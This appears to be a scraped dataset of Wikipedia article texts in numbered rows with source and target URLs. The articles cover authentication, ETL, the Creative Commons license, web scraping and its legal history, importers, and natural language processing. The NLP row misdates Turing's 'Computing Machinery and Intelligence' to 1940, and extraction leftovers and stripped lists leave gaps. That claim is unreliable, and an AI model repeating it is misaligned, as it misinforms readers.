packaging can include a variable QR Code. A QR Code alone is easy to verify but offers a weak level of authentication as it offers no protection against counterfeits unless scan data is analyzed at the system level to detect anomalies. 18 To increase the security level, the QR Code can be combined with a digital watermark or copy detection pattern that are robust to copy attempts and can be authenticated with a smartphone. A secure key storage device can be used for authentication in consumer electronics, network authentication, license management, supply chain management, etc. Generally, the device to be authenticated needs some sort of wireless or wired digital connection to either a host system or a network. Nonetheless, the component being authenticated need not be electronic in nature as an authentication chip can be mechanically attached and read through a connector to the host e.g. an authenticated ink tank for use with a printer. For products and services that these secure coprocessors can be applied to, they can offer a solution that can be much more difficult to counterfeit than most other options while at the same time being more easily verified. 1 Packaging and labeling can be engineered to help reduce the risks of counterfeit consumer goods or the theft and resale of products. 19 20 Some package constructions are more difficult to copy and some have pilfer indicating seals. Counterfeit goods, unauthorized sales (diversion), material substitution and tampering can all be reduced with these anti-counterfeiting technologies. Packages may include authentication seals and use security printing to help indicate that the package and contents are not counterfeit; these too are subject to counterfeiting. Packages also can include anti-theft devices, such as dye-packs, RFID tags, or electronic article surveillance 21 tags that can be activated or detected by devices at exit points and require specialized tools to deactivate. Anti-counterfeiting technologies that can be used with packaging include: Literary forgery can involve imitating the style of a famous author. If an original manuscript, typewritten text, or recording is available, then the medium itself (or its packaging anything from a box to e-mail headers) can help prove or disprove the authenticity of the document. However, text, audio, and video can be copied into new media, possibly leaving only the informational content itself to use in authentication. Various systems have been invented to allow authors to provide a means for readers to reliably authenticate that a given message originated from or was relayed by them. These involve authentication factors like: The opposite problem is the detection of plagiarism, where information from a different author is passed off as a person's own work. A common technique for proving plagiarism is the discovery of another copy of the same or very similar text, which has different attribution. In some cases, excessively high quality or a style mismatch may raise suspicion of plagiarism. In literacy, authentication is a readers’ process of questioning the veracity of an aspect of literature and then verifying those questions via research. The fundamental question for authentication of literature is Does one believe it? Related to that, an authentication project is therefore a reading and writing activity in which students document the relevant research process ( 22 ). It builds students' critical literacy. The documentation materials for literature go beyond narrative texts and likely include informational texts, primary sources, and multimedia. The process typically involves both internet and hands-on library research. When authenticating historical fiction in particular, readers consider the extent that the major historical events, as well as the culture portrayed (e.g., the language, clothing, food, gender roles), are believable for the period. 3 Historically, fingerprints have been used as the most authoritative method of authentication, but court cases in the US and elsewhere have raised fundamental doubts about fingerprint reliability. 23 Outside of the legal system as well, fingerprints are easily spoofable, with British Telecom's top computer security official noting that "few" fingerprint readers have not already been tricked by one spoof or another. 24 Hybrid or two-tiered authentication methods offer a compelling according to whom? solution, such as private keys encrypted by fingerprint inside of a USB device. In a computer data context, cryptographic methods have been developed which are not spoofable if the originator's key has not been compromised. That the originator (or anyone other than an attacker) knows (or doesn't know) about a compromise is irrelevant. However, it is not known whether these cryptographically based authentication methods are provably secure, since unanticipated mathematical developments may make them vulnerable to attack in the future. If that were to occur, it may call into question much of the authentication in the past. In particular, a digitally signed contract may be questioned when a new attack on the cryptography underlying the signature is discovered. citation needed The process of authorization is distinct from that of authentication. Whereas authentication is the process of verifying that "you are who you say you are", authorization is the process of verifying that "you are permitted to do what you are trying to do". While authorization often happens immediately after authentication (e.g., when logging into a computer system), this does not mean authorization presupposes authentication: an anonymous agent could be authorized to a limited action set. 25 One familiar use of authentication and authorization is access control. A computer system that is supposed to be used only by those authorized must attempt to detect and exclude the unauthorized. Access to it is therefore usually controlled by insisting on an authentication procedure to establish with some degree of confidence the identity of the user, granting privileges established for that identity. |
480 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Extract,_transform,_load | In computing, extract, transform, load (ETL) is a three-phase process where data is extracted from an input source, transformed (including cleaning), and loaded into an output data container. The data can be collated from one or more sources and it can also be output to one or more destinations. ETL processing is typically executed using software applications but it can also be done manually by system operators. ETL software typically automates the entire process and can be run manually or on recurring schedules either as single jobs or aggregated into a batch of jobs. A properly designed ETL system extracts data from source systems and enforces data type and data validity standards and ensures it conforms structurally to the requirements of the output. Some ETL systems can also deliver data in a presentation-ready format so that application developers can build applications and end users can make decisions. 1 The ETL process is often used in data warehousing. 2 ETL systems commonly integrate data from multiple applications (systems), typically developed and supported by different vendors or hosted on separate computer hardware. The separate systems containing the original data are frequently managed and operated by different stakeholders. For example, a cost accounting system may combine data from payroll, sales, and purchasing. Data extraction involves extracting data from homogeneous or heterogeneous sources; data transformation processes data by data cleaning and transforming it into a proper storage format structure for the purposes of querying and analysis; finally, data loading describes the insertion of data into the final target database such as an operational data store, a data mart, data lake or a data warehouse. 3 4 ETL processing involves extracting the data from the source system(s). In many cases, this represents the most important aspect of ETL, since extracting data correctly sets the stage for the success of subsequent processes. Most data-warehousing projects combine data from different source systems. Each separate system may also use a different data organization and or format. Common data-source formats include relational databases, flat-file databases, XML, and JSON, but may also include non-relational database structures such as IBM Information Management System or other data structures such as Virtual Storage Access Method (VSAM) or Indexed Sequential Access Method (ISAM), or even formats fetched from outside sources by means such as a web crawler or data scraping. The streaming of the extracted data source and loading on-the-fly to the destination database is another way of performing ETL when no intermediate data storage is required. An intrinsic part of the extraction involves data validation to confirm whether the data pulled from the sources has the correct expected values in a given domain (such as a pattern default or list of values). If the data fails the validation rules, it is rejected entirely or in part. The rejected data is ideally reported back to the source system for further analysis to identify and to rectify incorrect records or perform data wrangling. In the data transformation stage, a series of rules or functions are applied to the extracted data in order to prepare it for loading into the end target. An important function of transformation is data cleansing, which aims to pass only "proper" data to the target. The challenge when different systems interact is in the relevant systems' interfacing and communicating. Character sets that may be available in one system may not be so in others. In other cases, one or more of the following transformation types may be required to meet the business and technical needs of the server or data warehouse: The load phase loads the data into the end target, which can be any data store including a simple delimited flat file or a data warehouse. Depending on the requirements of the organization, this process varies widely. Some data warehouses may overwrite existing information with cumulative information; updating extracted data is frequently done on a daily, weekly, or monthly basis. Other data warehouses (or even other parts of the same data warehouse) may add new data in a historical form at regular intervals — for example, hourly. To understand this, consider a data warehouse that is required to maintain sales records of the last year. This data warehouse overwrites any data older than a year with newer data. However, the entry of data for any one year window is made in a historical manner. The timing and scope to replace or append are strategic design choices dependent on the time available and the business needs. More complex systems can maintain a history and audit trail of all changes to the data loaded in the data warehouse. As the load phase interacts with a database, the constraints defined in the database schema — as well as in triggers activated upon data load — apply (for example, uniqueness, referential integrity, mandatory fields), which also contribute to the overall data quality performance of the ETL process. The typical real-life ETL cycle consists of the following execution steps: ETL processes can involve considerable complexity, and significant operational problems can occur with improperly designed ETL systems. The range of data values or data quality in an operational system may exceed the expectations of designers at the time validation and transformation rules are specified. Data profiling of a source during data analysis can identify the data conditions that must be managed by transform rules specifications, leading to an amendment of validation rules explicitly and implicitly implemented in the ETL process. Data warehouses are typically assembled from a variety of data sources with different formats and purposes. As such, ETL is a key process to bring all the data together in a standard, homogeneous environment. Design analysis 5 should establish the scalability of an ETL system across the lifetime of its usage — including understanding the volumes of data that must be processed within service level agreements. The time available to extract from source systems may change, which may mean the same amount of data may have to be processed in less time. Some ETL systems have to scale to process terabytes of data to update data warehouses with tens of terabytes of data. Increasing volumes of data may require designs that can scale from daily batch to multiple-day micro batch to integration with message queues or real-time change-data-capture for continuous transformation and update. ETL vendors benchmark their record-systems at multiple TB (terabytes) per hour (or 1 GB per second) using powerful servers with multiple CPUs, multiple hard drives, multiple gigabit-network connections, and much memory. In real life, the slowest part of an ETL process usually occurs in the database load phase. Databases may perform slowly because they have to take care of concurrency, integrity maintenance, and indices. Thus, for better performance, it may make sense to employ: Still, even using bulk operations, database access is usually the bottleneck in the ETL process. Some common methods used to increase performance are: Whether to do certain operations in the database or outside may involve a trade-off. For example, removing duplicates using distinct may be slow in the database; thus, it makes sense to do it outside. On the other side, if using distinct significantly (x100) decreases the number of rows to be extracted, then it makes sense to remove duplications as early as possible in the database before unloading data. A common source of problems in ETL is a big number of dependencies among ETL jobs. For example, job "B" cannot start while job "A" is not finished. One can usually achieve better performance by visualizing all processes on a graph, and trying to reduce the graph making maximum use of parallelism, and making "chains" of consecutive processing as short as possible. Again, partitioning of big tables and their indices can really help. Another common issue occurs when the data are spread among several databases, and processing is done in those databases sequentially. Sometimes database replication may be involved as a method of copying data between databases — it can significantly slow down the whole process. The common solution is to reduce the processing graph to only three layers: This approach allows processing to take maximum advantage of parallelism. For example, if you need to load data into two databases, you can run the loads in parallel (instead of loading into the first — and then replicating into the second). Sometimes processing must take place sequentially. For example, dimensional (reference) data are needed before one can get and validate the rows for main "fact" tables. A recent update development in ETL software is the implementation of parallel processing. It has enabled a number of methods to improve overall performance of ETL when dealing with large volumes of data. ETL applications implement three main types of parallelism: All three types of parallelism usually operate combined in a single job or task. An additional difficulty comes with making sure that the data being uploaded is relatively consistent. Because multiple source databases may have different update cycles (some may be updated every few minutes, while others may take days or weeks), an ETL system may be required to hold back certain data until all sources are synchronized. Likewise, where a warehouse may have to be reconciled to the contents in a source system or with the general ledger, establishing synchronization and reconciliation points becomes necessary. Data warehousing procedures usually subdivide a big ETL process into smaller pieces running sequentially or in parallel. To keep track of data flows, it makes sense to tag each data row with "row id", and tag each piece of the process with "run id". In case of a failure, having these IDs help to roll back and rerun the failed piece. Best practice also calls for checkpoints, which are states when certain phases of the process are completed. Once at a checkpoint, it is a good idea to write everything to disk, clean out some temporary files, log the state, etc. As of 2010 update , data virtualization had begun to advance ETL processing. The application of data virtualization to ETL allowed solving the most common ETL tasks of data migration and application integration for multiple dispersed data sources. Virtual ETL operates with the abstracted representation of the objects or entities gathered from the variety of relational, semi-structured, and unstructured data sources. ETL tools can leverage object-oriented modeling and work with entities' representations persistently stored in a centrally located hub-and-spoke architecture. Such a collection that contains representations of the entities or objects gathered from the data sources for ETL processing is called a metadata repository and it can reside in memory or be made persistent. By using a persistent metadata repository, ETL tools can transition from one-time projects to persistent middleware, performing data harmonization and data profiling consistently and in near-real time. Unique keys play an important part in all relational databases, as they tie everything together. A unique key is a column that identifies a given entity, whereas a foreign key is a column in another table that refers to a primary key. Keys can comprise several columns, in which case they are composite keys. In many cases, the primary key is an auto-generated integer that has no meaning for the business entity being represented, but solely exists for the purpose of the relational database - commonly referred to as a surrogate key. As there is usually more than one data source getting loaded into the warehouse, the keys are an important concern to be addressed. For example: customers might be represented in several data sources, with their Social Security number as the primary key in one source, their phone number in another, and a surrogate in the third. Yet a data warehouse may require the consolidation of all the customer information into one dimension. A recommended way to deal with the concern involves adding a warehouse surrogate key, which is used as a foreign key from the fact table. 6 Usually, updates occur to a dimension's source data, which obviously must be reflected in the data warehouse. If the primary key of the source data is required for reporting, the dimension already contains that piece of information for each row. If the source data uses a surrogate key, the warehouse must keep track of it even though it is never used in queries or reports; it is done by creating a lookup table that contains the warehouse surrogate key and the originating key. 7 This way, the dimension is not polluted with surrogates from various source systems, while the ability to update is preserved. The lookup table is used in different ways depending on the nature of the source data. There are 5 types to consider; 7 three are included here: An established ETL framework may improve connectivity and scalability. citation needed A good ETL tool must be able to communicate with the many different relational databases and read the various file formats used throughout an organization. ETL tools have started to migrate into enterprise application integration, or even enterprise service bus, systems that now cover much more than just the extraction, transformation, and loading of data. Many ETL vendors now have data profiling, data quality, and metadata capabilities. A common use case for ETL tools include converting CSV files to formats readable by relational databases. A typical translation of millions of records is facilitated by ETL tools that enable users to input csv-like data feeds files and import them into a database with as little code as possible. ETL tools are typically used by a broad range of professionals — from students in computer science looking to quickly import large data sets to database architects in charge of company account management, ETL tools have become a convenient tool that can be relied on to get maximum performance. ETL tools in most cases contain a GUI that helps users conveniently transform data, using a visual data mapper, as opposed to writing large programs to parse files and modify data types. While ETL tools have traditionally been for developers and IT staff, research firm Gartner wrote that the new trend is to provide these capabilities to business users so they can themselves create connections and data integrations when needed, rather than going to the IT staff. 8 Gartner refers to these non-technical users as Citizen Integrators. 9 Extract, load, transform (ELT) is a variant of ETL where the extracted data is loaded into the target system first. 10 The architecture for the analytics pipeline shall also consider where to cleanse and enrich data 10 as well as how to conform dimensions. 1 Some of the benefits of an ELT process include speed and the ability to more easily handle both unstructured and structured data. 11 Ralph Kimball and Joe Caserta's book The Data Warehouse ETL Toolkit, (Wiley, 2004), which is used as a textbook for courses teaching ETL processes in data warehousing, addressed this issue. 12 Cloud-based data warehouses like Amazon Redshift, Google BigQuery, Microsoft Azure Synapse Analytics and Snowflake Inc. have been able to provide highly scalable computing power. This lets businesses forgo preload transformations and replicate raw data into their data warehouses, where it can transform them as needed using SQL. After having used ELT, data may be processed further and stored in a data mart. 13 Most data integration tools skew towards ETL, while ELT is popular in database and data warehouse appliances. Similarly, it is possible to perform TEL (Transform, Extract, Load) where data is first transformed on a blockchain (as a way of recording changes to data, e.g., token burning) before extracting and loading into another data store. 14 |
481 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Wikipedia:Text_of_the_Creative_Commons_Attribution-ShareAlike_4.0_International_License | You are free: for any purpose, even commercially. The licensor cannot revoke these freedoms as long as you follow the license terms. Under the following terms: Notices: By exercising the Licensed Rights (defined below), You accept and agree to be bound by the terms and conditions of this Creative Commons Attribution-ShareAlike 4.0 International Public License ("Public License"). To the extent this Public License may be interpreted as a contract, You are granted the Licensed Rights in consideration of Your acceptance of these terms and conditions, and the Licensor grants You such rights in consideration of benefits the Licensor receives from making the Licensed Material available under these terms and conditions. Your exercise of the Licensed Rights is expressly made subject to the following conditions. Where the Licensed Rights include Sui Generis Database Rights that apply to Your use of the Licensed Material: For the avoidance of doubt, this Section 4 supplements and does not replace Your obligations under this Public License where the Licensed Rights include other Copyright and Similar Rights. Creative Commons is not a party to its public licenses. Notwithstanding, Creative Commons may elect to apply one of its public licenses to material it publishes and in those instances will be considered the "Licensor. The text of the Creative Commons public licenses is dedicated to the public domain under the CC0 Public Domain Dedication. Except for the limited purpose of indicating that material is shared under a Creative Commons public license or as otherwise permitted by the Creative Commons policies published at creativecommons.org policies, Creative Commons does not authorize the use of the trademark "Creative Commons" or any other trademark or logo of Creative Commons without its prior written consent including, without limitation, in connection with any unauthorized modifications to any of its public licenses or any other arrangements, understandings, or agreements concerning use of licensed material. For the avoidance of doubt, this paragraph does not form part of the public licenses. |
482 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/w/index.php?title=Web_scraping&action=history | For any version listed below, click on its date to view it. For more help, see Help:Page history and Help:Edit summary. (cur) difference from current version, (prev) difference from preceding version, m minor edit, section edit, automatic edit summary |
483 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_ref-17 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
484 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Importer_(computing) | An importer is a software application that reads in a data file or metadata information in one format and converts it to another format via special algorithms (such as filters). An importer often is not an entire program by itself, but an extension to another program, implemented as a plug-in. When implemented in this way, the importer reads the data from the file and converts it into the hosting application's native format. 1 For example, the data file for a 3D model may be written from a modeler, such as 3D Studio Max. A game developer may then want to use that model in their game's editor. An importer, part of the editor, may read in the 3D Studio Max model and convert it to the game's native format so it can be used in game levels. Importers are important tools in the video game industry. A plug-in or application that does the converse of an importer is called an exporter. |
485 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Natural_language_processing | Natural language processing (NLP) is an interdisciplinary subfield of computer science and artificial intelligence. It is primarily concerned with providing computers with the ability to process data encoded in natural language and is thus closely related to information retrieval, knowledge representation and computational linguistics, a subfield of linguistics. Typically data is collected in text corpora, using either rule-based, statistical or neural-based approaches in machine learning and deep learning. Major tasks in natural language processing are speech recognition, text classification, natural-language understanding, and natural-language generation. Natural language processing has its roots in the 1940s. 1 Already in 1940, Alan Turing published an article titled "Computing Machinery and Intelligence" which proposed what is now called the Turing test as a criterion of intelligence, though at the time that was not articulated as a problem separate from artificial intelligence. The proposed test includes a task that involves the automated interpretation and generation of natural language. The premise of symbolic NLP is well-summarized by John Searle's Chinese room experiment: Given a collection of rules (e.g., a Chinese phrasebook, with questions and matching answers), the computer emulates natural language understanding (or other NLP tasks) by applying those rules to the data it confronts. Up until the 1980s, most natural language processing systems were based on complex sets of hand-written rules. Starting in the late 1980s, however, there was a revolution in natural language processing with the introduction of machine learning algorithms for language processing. This was due to both the steady increase in computational power (see Moore's law) and the gradual lessening of the dominance of Chomskyan theories of linguistics (e.g. transformational grammar), whose theoretical underpinnings discouraged the sort of corpus linguistics that underlies the machine-learning approach to language processing. 8 In 2003, word n-gram model, at the time the best statistical algorithm, was outperformed by a multi-layer perceptron (with a single hidden layer and context length of several words trained on up to 14 million of words with a CPU cluster in language modelling) by Yoshua Bengio with co-authors. 9 In 2010, Tom Mikolov (then a PhD student at Brno University of Technology) with co-authors applied a simple recurrent neural network with a single hidden layer to language modelling, 10 and in the following years he went on to develop Word2vec. In the 2010s, representation learning and deep neural network-style (featuring many hidden layers) machine learning methods became widespread in natural language processing. That popularity was due partly to a flurry of results showing that such techniques 11 12 can achieve state-of-the-art results in many natural language tasks, e.g., in language modeling 13 and parsing. 14 15 This is increasingly important in medicine and healthcare, where NLP helps analyze notes and text in electronic health records that would otherwise be inaccessible for study when seeking to improve care 16 or protect patient privacy. 17 Symbolic approach, i.e., the hand-coding of a set of rules for manipulating symbols, coupled with a dictionary lookup, was historically the first approach used both by AI in general and by NLP in particular: 18 19 such as by writing grammars or devising heuristic rules for stemming. Machine learning approaches, which include both statistical and neural networks, on the other hand, have many advantages over the symbolic approach: Although rule-based systems for manipulating symbols were still in use in 2020, they have become mostly obsolete with the advance of LLMs in 2023. Before that they were commonly used: In the late 1980s and mid 1990s, the statistical approach ended a period of AI winter, which was caused by the inefficiencies of the rule-based approaches. 20 21 The earliest decision trees, producing systems of hard if then rules, were still very similar to the old rule-based approaches. Only the introduction of hidden Markov models, applied to part-of-speech tagging, announced the end of the old rule-based approach. A major drawback of statistical methods is that they require elaborate feature engineering. Since 2015, 22 the statistical approach has been replaced by the neural networks approach, using semantic networks 23 and word embeddings to capture semantic properties of words. Intermediate tasks (e.g., part-of-speech tagging and dependency parsing) are not needed anymore. Neural machine translation, based on then-newly-invented sequence-to-sequence transformations, made obsolete the intermediate steps, such as word alignment, previously necessary for statistical machine translation. The following is a list of some of the most commonly researched tasks in natural language processing. Some of these tasks have direct real-world applications, while others more commonly serve as subtasks that are used to aid in solving larger tasks. Though natural language processing tasks are closely intertwined, they can be subdivided into categories for convenience. A coarse division is given below. Based on long-standing trends in the field, it is possible to extrapolate future directions of NLP. As of 2020, three trends among the topics of the long-standing series of CoNLL Shared Tasks can be observed: 46 Most higher-level NLP applications involve aspects that emulate intelligent behaviour and apparent comprehension of natural language. More broadly speaking, the technical operationalization of increasingly advanced aspects of cognitive behaviour represents one of the developmental trajectories of NLP (see trends among CoNLL shared tasks above). Cognition refers to "the mental action or process of acquiring knowledge and understanding 